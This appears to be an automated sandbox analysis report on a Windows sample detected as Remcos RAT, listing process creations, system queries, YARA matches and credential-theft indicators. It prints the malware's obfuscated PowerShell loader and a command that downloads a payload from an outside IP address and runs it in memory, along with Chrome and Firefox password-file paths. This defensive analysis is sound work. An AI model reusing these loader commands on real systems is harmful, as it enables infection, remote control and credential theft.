Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??og?v?c8?oq?x?c4?mg?w?di?lg?y?dm?mw?u?de?ng?5?c8?v?bh?gs?lwbs?gu?zw?v?e0?yqby?ho?lwbe?fi?rw?v?fi?v?bd?c8?qqbe?c8?z?bs?gw?lgb0?hg?d??n?c??ow?k?em?wqby?eo?u??g?d0?i??o?c??wwbt?hk?cwb0?gu?bq?u?ek?tw?u?f??yqb0?gg?xq?6?do?rwbl?hq?v?bl?g0?c?bq?ge?d?bo?cg?kq?g?cs?i??n?gq?b?bs?d??mq?u?hq?e?b0?cc?i??p?c??owbj?g4?dgbv?gs?zq?t?fc?zqbi?fi?zqbx?hu?zqbz?hq?i??t?fu?ugbj?c??j?bd?em?ugbo?g0?i??t?e8?dqb0?ey?aqbs?gu?i??k?em?wqby?eo?u??g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?i?bw?g8?dwbl?hi?cwbo?gu?b?bs?c4?zqb4?gu?i??t?gm?bwbt?g0?yqbu?gq?i?b7?c??j?bd?fk?cgbk?f??i??9?c??k??g?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?c??kq?g?ds?j?bn?ec?aqbt?ee?i??9?c??k??g?ec?zqb0?c0?qwbv?g4?d?bl?g4?d??g?c0?u?bh?hq?a??g?cq?qwbz?hi?sgbq?c??kq?g?ds?i?b9?c??ow?k?hg?awbs?gw?a??g?d0?i??n?d??jw?g?ds?j?bi?h??dgby?hy?i??9?c??jw?l?eo?awbr?ge?cwbe?gy?zwby?fq?zw?l?cc?i??7?fs?qgb5?hq?zqbb?f0?xq?g?cq?bqbx?g8?bgbz?c??pq?g?fs?cwb5?hm?d?bl?g0?lgbd?g8?bgb2?gu?cgb0?f0?og?6?ey?cgbv?g0?qgbh?hm?zq?2?dq?uwb0?hi?aqbu?gc?k??g?cg?i?bh?gu?d??t?em?bwbu?hq?zqbu?hq?i??t?f??yqb0?gg?i??k?em?wqby?eo?u??g?ck?lgby?gu?c?bs?ge?ywbl?cg?jw?k?cq?jw?s?cc?qq?n?ck?i??p?c??owbb?fm?eqbz?hq?zqbt?c4?qqbw?h??r?bv?g0?yqbp?g4?xq?6?do?qwb1?hi?cgbl?g4?d?be?g8?bqbh?gk?bg?u?ew?bwbh?gq?k??k?g0?cqbv?g4?cw?p?c4?rwbl?hq?v?b5?h??zq?o?cc?v?bl?gg?dqbs?gm?a?bl?hm?w?b4?fg?e?b4?c4?qwbs?ge?cwbz?de?jw?p?c4?rwbl?hq?tqbl?hq?a?bv?gq?k??n?e0?cwbx?ei?sqbi?fk?jw?p?c4?sqbu?hy?bwbr?gu?k??k?g4?dqbs?gw?l??g?fs?bwbi?go?zqbj?hq?wwbd?f0?i??o?c??jwbk?ee?qg?0?ee?s?br?ee?t?bn?ei?mgbb?ec?o?bb?gi?zwbb?du?qqbe?eu?qqbj?hc?qgb2?ee?s?bn?ee?t?b3?ei?egbb?ec?uqbb?fk?uqbc?hy?qqbh?hc?qqbi?gc?qg?z?ee?rw?4?ee?wgbb?ee?dgbb?eq?awbb?e0?uqbc?gw?qqbi?ek?qqbz?gc?qgb0?ee?rwbv?ee?yqbr?ei?mgbb?ec?o?bb?gi?zwbb?hy?qqbd?d??qqbm?fe?qq?y?ee?r?bj?ee?tgbr?ee?m?bb?eg?sqbb?gi?dwbc?d??qqbh?e0?qqba?fe?qgbv?ee?qw?4?ee?wgb3?ei?eqbb?ec?o?bb?ew?zwbc?d??qqbh?fu?qqbh?hc?qgbq?ee?s?bv?ee?wqbn?ei?m?bb?ec?awbb?fk?zwbb?hy?qqbd?dg?qqbp?gc?qgb6?ee?s?bb?ee?z?bb?ei?m?bb?ec?zwbb?cc?i??s?c??j?bi?h??dgby?hy?i??s?c??jwbf?f8?xwbf?f8?cwbj?hm?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?hg?awbs?gw?a??s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?c??ow?=';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.replace('%jkqasdfgrtg%', 'c:\users\user\desktop\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'http://91.202.233.169/tak/reg/marz/drg/rtc/ad/dll.txt' ;$cyrjp = ( [system.io.path]::gettemppath() + 'dll01.txt' ) ;invoke-webrequest -uri $ccrhm -outfile $cyrjp -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $cyrjp = ( [system.io.path]::gettemppath() + 'dll01.txt' ) ;$ggima = ( get-content -path $cyrjp ) ; } ;$xkllh = '0' ;$bpvrv = 'c:\users\user\desktop\sostener.vbs' ;[byte[]] $mqons = [system.convert]::frombase64string( ( get-content -path $cyrjp ).replace('$$','a') ) ;[system.appdomain]::currentdomain.load($mqons).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ( 'dab4ahqalgb2ag8abga5adeacwbvahmalwbzagqayqbvagwabgb3ag8azaavadkamqblahiaygbtaguaaqb2ag8abgavac0alqa2adcanqa0ahiabwb0agmazqboac8azwbyag8algb0aguaawbjahuaygb0agkaygavac8aogbzahaadab0agga' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'roda' )) ;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand iaakaemawqbyaeoauaagad0aiaaoacaawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accaiaapacaaowakagcarwbpag0aqqagad0aiaaoacaarwblahqalqbdag8abgb0aguabgb0acaalqbqageadaboacaajabdafkacgbkafaaiaapacaaowagaa== -inputformat xml -outputformat text
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??og?v?c8?oq?x?c4?mg?w?di?lg?y?dm?mw?u?de?ng?5?c8?v?bh?gs?lwbs?gu?zw?v?e0?yqby?ho?lwbe?fi?rw?v?fi?v?bd?c8?qqbe?c8?z?bs?gw?lgb0?hg?d??n?c??ow?k?em?wqby?eo?u??g?d0?i??o?c??wwbt?hk?cwb0?gu?bq?u?ek?tw?u?f??yqb0?gg?xq?6?do?rwbl?hq?v?bl?g0?c?bq?ge?d?bo?cg?kq?g?cs?i??n?gq?b?bs?d??mq?u?hq?e?b0?cc?i??p?c??owbj?g4?dgbv?gs?zq?t?fc?zqbi?fi?zqbx?hu?zqbz?hq?i??t?fu?ugbj?c??j?bd?em?ugbo?g0?i??t?e8?dqb0?ey?aqbs?gu?i??k?em?wqby?eo?u??g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?i?bw?g8?dwbl?hi?cwbo?gu?b?bs?c4?zqb4?gu?i??t?gm?bwbt?g0?yqbu?gq?i?b7?c??j?bd?fk?cgbk?f??i??9?c??k??g?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?c??kq?g?ds?j?bn?ec?aqbt?ee?i??9?c??k??g?ec?zqb0?c0?qwbv?g4?d?bl?g4?d??g?c0?u?bh?hq?a??g?cq?qwbz?hi?sgbq?c??kq?g?ds?i?b9?c??ow?k?hg?awbs?gw?a??g?d0?i??n?d??jw?g?ds?j?bi?h??dgby?hy?i??9?c??jw?l?eo?awbr?ge?cwbe?gy?zwby?fq?zw?l?cc?i??7?fs?qgb5?hq?zqbb?f0?xq?g?cq?bqbx?g8?bgbz?c??pq?g?fs?cwb5?hm?d?bl?g0?lgbd?g8?bgb2?gu?cgb0?f0?og?6?ey?cgbv?g0?qgbh?hm?zq?2?dq?uwb0?hi?aqbu?gc?k??g?cg?i?bh?gu?d??t?em?bwbu?hq?zqbu?hq?i??t?f??yqb0?gg?i??k?em?wqby?eo?u??g?ck?lgby?gu?c?bs?ge?ywbl?cg?jw?k?cq?jw?s?cc?qq?n?ck?i??p?c??owbb?fm?eqbz?hq?zqbt?c4?qqbw?h??r?bv?g0?yqbp?g4?xq?6?do?qwb1?hi?cgbl?g4?d?be?g8?bqbh?gk?bg?u?ew?bwbh?gq?k??k?g0?cqbv?g4?cw?p?c4?rwbl?hq?v?b5?h??zq?o?cc?v?bl?gg?dqbs?gm?a?bl?hm?w?b4?fg?e?b4?c4?qwbs?ge?cwbz?de?jw?p?c4?rwbl?hq?tqbl?hq?a?bv?gq?k??n?e0?cwbx?ei?sqbi?fk?jw?p?c4?sqbu?hy?bwbr?gu?k??k?g4?dqbs?gw?l??g?fs?bwbi?go?zqbj?hq?wwbd?f0?i??o?c??jwbk?ee?qg?0?ee?s?br?ee?t?bn?ei?mgbb?ec?o?bb?gi?zwbb?du?qqbe?eu?qqbj?hc?qgb2?ee?s?bn?ee?t?b3?ei?egbb?ec?uqbb?fk?uqbc?hy?qqbh?hc?qqbi?gc?qg?z?ee?rw?4?ee?wgbb?ee?dgbb?eq?awbb?e0?uqbc?gw?qqbi?ek?qqbz?gc?qgb0?ee?rwbv?ee?yqbr?ei?mgbb?ec?o?bb?gi?zwbb?hy?qqbd?d??qqbm?fe?qq?y?ee?r?bj?ee?tgbr?ee?m?bb?eg?sqbb?gi?dwbc?d??qqbh?e0?qqba?fe?qgbv?ee?qw?4?ee?wgb3?ei?eqbb?ec?o?bb?ew?zwbc?d??qqbh?fu?qqbh?hc?qgbq?ee?s?bv?ee?wqbn?ei?m?bb?ec?awbb?fk?zwbb?hy?qqbd?dg?qqbp?gc?qgb6?ee?s?bb?ee?z?bb?ei?m?bb?ec?zwbb?cc?i??s?c??j?bi?h??dgby?hy?i??s?c??jwbf?f8?xwbf?f8?cwbj?hm?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?hg?awbs?gw?a??s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?c??ow?=';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.replace('%jkqasdfgrtg%', 'c:\users\user\desktop\	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'http://91.202.233.169/tak/reg/marz/drg/rtc/ad/dll.txt' ;$cyrjp = ( [system.io.path]::gettemppath() + 'dll01.txt' ) ;invoke-webrequest -uri $ccrhm -outfile $cyrjp -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $cyrjp = ( [system.io.path]::gettemppath() + 'dll01.txt' ) ;$ggima = ( get-content -path $cyrjp ) ; } ;$xkllh = '0' ;$bpvrv = 'c:\users\user\desktop\sostener.vbs' ;[byte[]] $mqons = [system.convert]::frombase64string( ( get-content -path $cyrjp ).replace('$$','a') ) ;[system.appdomain]::currentdomain.load($mqons).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ( 'dab4ahqalgb2ag8abga5adeacwbvahmalwbzagqayqbvagwabgb3ag8azaavadkamqblahiaygbtaguaaqb2ag8abgavac0alqa2adcanqa0ahiabwb0agmazqboac8azwbyag8algb0aguaawbjahuaygb0agkaygavac8aogbzahaadab0agga' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'roda' )) ;"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand iaakaemawqbyaeoauaagad0aiaaoacaawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accaiaapacaaowakagcarwbpag0aqqagad0aiaaoacaarwblahqalqbdag8abgb0aguabgb0acaalqbqageadaboacaajabdafkacgbkafaaiaapacaaowagaa== -inputformat xml -outputformat text	Jump to behavior

Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\VMf
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\13<M
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\}M{
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager0
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\k`M
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\M
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\21
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerDMt
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\k
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\*MJ
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\#MQ
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager;
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\XMX
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUG\QM_
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, registros.dat.15.dr	Binary or memory string: [Program Manager]

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00433E0A cpuid

15_2_00433E0A

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoA,	15_2_0040E679
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: EnumSystemLocalesW,	15_2_004470AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,	15_2_004510BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	15_2_004511E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,	15_2_004512EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_004513B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,	15_2_00447597
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	15_2_00450A7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: EnumSystemLocalesW,	15_2_00450CF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: EnumSystemLocalesW,	15_2_00450D42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: EnumSystemLocalesW,	15_2_00450DDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	15_2_00450E6A

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00404915 GetLocalTime,CreateEventA,CreateThread,

15_2_00404915

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0041A7A2 GetComputerNameExW,GetUserNameW,

15_2_0041A7A2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

15_2_0044800F

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Contains functionality to steal Chrome passwords or cookies

Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\registros.dat, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

15_2_0040B21B

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		15_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: \key3.db		15_2_0040B335

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0883UG